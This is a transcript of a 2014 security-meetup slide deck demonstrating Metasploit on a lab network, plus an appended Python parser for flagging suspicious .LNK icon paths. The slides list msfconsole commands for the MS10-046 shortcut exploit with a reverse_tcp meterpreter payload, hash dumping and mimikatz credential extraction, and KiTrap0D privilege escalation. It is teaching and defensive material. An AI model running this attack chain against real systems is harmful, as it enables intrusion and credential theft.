Metasploit Demo
Published on: null Bangalore Chapter - May 2014 Meet
Published in: Education, Technology
Transcript of "Metasploit Demo"

  1. Metasploit Demo. Rupam Bhattacharya
  2. Introduction • It is a free, open source penetration testing framework started by H. D. Moore in 2003, which was later acquired by Rapid7. The current stable versions of the framework are written in the Ruby language. It has the world's largest database of tested exploits and receives more than a million downloads every year. It is also one of the most complex projects built in Ruby to date.
  3. Terminology • Vulnerability: a weakness which allows an attacker/pentester to break into or compromise a system's security. This weakness can exist in the operating system, in application software, or even in the network protocols. • Exploit: code which allows an attacker/tester to take advantage of the vulnerable system and compromise its security. Every vulnerability has its own corresponding exploit. Metasploit v4 has more than 1200 exploits. • Payload: the actual code which does the work. It runs on the system after exploitation. Payloads are mostly used to set up a connection between the attacking machine and the victim machine. Metasploit v4 has more than 400 payloads. • Module: modules are the small building blocks of a complete system. Every module performs a specific task, and a complete system is built by combining several modules to function as a single unit. The biggest advantage of such an architecture is that it becomes easy for developers to integrate new exploit code and tools into the framework.
  4. Demo • msfconsole: provides an "all-in-one" centralized console and allows you efficient access to virtually all of the options available in the Metasploit Framework.
  5. Demo • use exploit/windows/browser/ms10_046_shortcut_icon_dllloader • Also used in Stuxnet. • This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK) that contain an icon resource pointing to a malicious DLL. This module creates a WebDAV service that can be used to run an arbitrary payload when accessed as a UNC path. • CVE-2010-2568
  6. Demo • show options • set SRVHOST 192.168.56.102
  7. Demo • set PAYLOAD windows/meterpreter/reverse_tcp • Connects back to the attacker and injects the Meterpreter server DLL via the Reflective DLL Injection payload (staged). • set LHOST 192.168.56.102
  8. Demo
  9. Demo • exploit
  10. Demo
  11. Demo • show sessions • sessions -i 1 • help • sysinfo
  12. Demo • getuid • run post/windows/gather/hashdump • load mimikatz – wdigest
  13. Demo • shell • net user Rupam. This is a local admin. Now we will try to elevate privileges to get SYSTEM level access.
  14. Demo • background • use exploit/windows/local/ [TAB TAB] • use exploit/windows/local/ms10_015_kitrap0d • This module will create a new session with SYSTEM privileges via the KiTrap0D exploit by Tavis Ormandy. If the session in use is already elevated, then the exploit will not run. The module relies on kitrap0d.x86.dll and is not supported on x64 editions of Windows.
  15. Demo • set SESSION 1 • set PAYLOAD windows/meterpreter/reverse_tcp • set LHOST 192.168.56.102 • set LPORT 4443 • show options • exploit
  16. Demo
  17. Demo • show sessions • sessions -i 2 • load mimikatz – wdigest
  18. Demo • run post/windows/gather/hashdump
  19. Who am I? • Rupam Bhattacharya • Reach me at ru94mb@null.co.in • Handle: @ru94mb
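Slide 5 describes the CVE-2010-2568 condition as a .LNK whose icon resource points to a DLL reached over a UNC/WebDAV path. The following Python is an added example for the defensive side (not code from the deck or from the Metasploit module): it parses the MS-SHLLINK ShellLinkHeader and StringData to recover the ICON_LOCATION string and applies a triage heuristic. The UNC-share and "DLL outside the Windows directory" rules, the build_lnk fixture builder and the sample paths are assumptions for illustration.

```python
import struct

# LinkFlags bits of the MS-SHLLINK ShellLinkHeader (offset 0x14).
HAS_IDLIST, HAS_LINKINFO = 0x01, 0x02
HAS_NAME, HAS_RELPATH, HAS_WORKDIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x04, 0x08, 0x10, 0x20, 0x40, 0x80
# StringData fields appear in this fixed order, each only when its flag is set.
STRING_FIELDS = [(HAS_NAME, "name"), (HAS_RELPATH, "relative_path"), (HAS_WORKDIR, "working_dir"),
                 (HAS_ARGS, "arguments"), (HAS_ICON, "icon_location")]
LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-...-46}, little-endian

def parse_lnk(data):
    """Return LinkFlags plus the StringData fields of a .LNK as a dict."""
    if len(data) < 76 or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LINK_CLSID:
        raise ValueError("not a ShellLink header")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    pos = 76
    if flags & HAS_IDLIST:       # LinkTargetIDList: 2-byte IDListSize followed by the IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINKINFO:     # LinkInfo: LinkInfoSize (4 bytes) counts the whole structure
        pos += struct.unpack_from("<I", data, pos)[0]
    result = {"flags": flags}
    for bit, name in STRING_FIELDS:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]      # CountCharacters, not bytes
        pos += 2
        width = 2 if flags & IS_UNICODE else 1               # ANSI decoded as latin-1 (assumption)
        raw = data[pos:pos + count * width]
        result[name] = raw.decode("utf-16-le" if width == 2 else "latin-1")
        pos += count * width
    return result

def icon_findings(data):
    """Heuristic triage (assumption): remote or non-system DLL icon sources are worth a look."""
    icon = parse_lnk(data).get("icon_location", "")
    low = icon.lower()
    findings = []
    if low.startswith("\\\\"):
        findings.append("icon resource on remote UNC path")
    if low.endswith(".dll") and not low.startswith("c:\\windows\\"):
        findings.append("icon resource is a DLL outside the Windows directory")
    return findings

def build_lnk(icon_location, idlist=b""):
    """Constructed fixture: minimal Unicode .LNK with ICON_LOCATION and an optional raw IDList."""
    flags = HAS_ICON | IS_UNICODE | (HAS_IDLIST if idlist else 0)
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LINK_CLSID, flags, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)
    body = struct.pack("<H", len(idlist)) + idlist if idlist else b""   # IDList must end in TerminalID
    return header + body + struct.pack("<H", len(icon_location)) + icon_location.encode("utf-16-le")
```

Pointing the checker at shortcuts arriving by mail or from a WebDAV share gives a quick first pass; a full triage would also walk the IDList and ExtraData blocks, which this example skips.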